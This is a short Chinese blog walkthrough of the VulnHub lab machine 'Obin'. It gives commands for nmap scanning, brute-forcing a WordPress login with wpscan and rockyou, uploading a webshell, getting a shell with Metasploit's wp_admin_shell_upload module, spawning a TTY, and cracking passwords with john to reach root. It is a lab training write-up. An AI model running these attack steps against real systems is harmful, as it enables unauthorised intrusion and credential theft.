vulnhub(二)-Obin

/ 0评 / 0

nmap扫描搜索靶机IP

nmap -sP 192.168.56.0/24

扫描搜索靶机开放端口

nmap -p -A 192.168.56.104

只开放了 80端口 进去看看

发现是 wordpress 搭建的CMS

看看能不能扫到后台

python3 dirsearch.py -u "http://192.168.56.104" -e php 

访问 http://192.168.56.104/wp-login.php 找到wordpress后台

burpsuite爆破 admin/qwerty

(这里可以有kali 自带的 wpscan 这是专门扫描 wordpress 漏洞的黑盒测试器)

wpscan --url http://192.168.56.104/wp-login.php --usernames admin --passwords /usr/share/wordlists/rockyou.txt

成功进入后台

在插件中上传我们的一句话木马

接着使用 msfconsole来提权

msfconsole

search wordpress shell

use exploit/unix/webapp/wp_admin_shell_upload

options

set username admin

set password qwerty

set rhost 192.168.56.104

run

接着 python3 提权到 tty

shell
 
python3 -c "import pty;pty.spawn('/bin/bash')"

查看 www 下的 wp-config.php 文件

接着利用 john 解密

john pass.txt  

john --show pass.txt

得到 root 权限 root/jasmine

备注,这里有师傅说 第一种提权可能会简单点:

https://www.cnblogs.com/ssw6/p/12668000.html

https://blog.csdn.net/zz_Caleb/article/details/88539227

发表评论

邮箱地址不会被公开。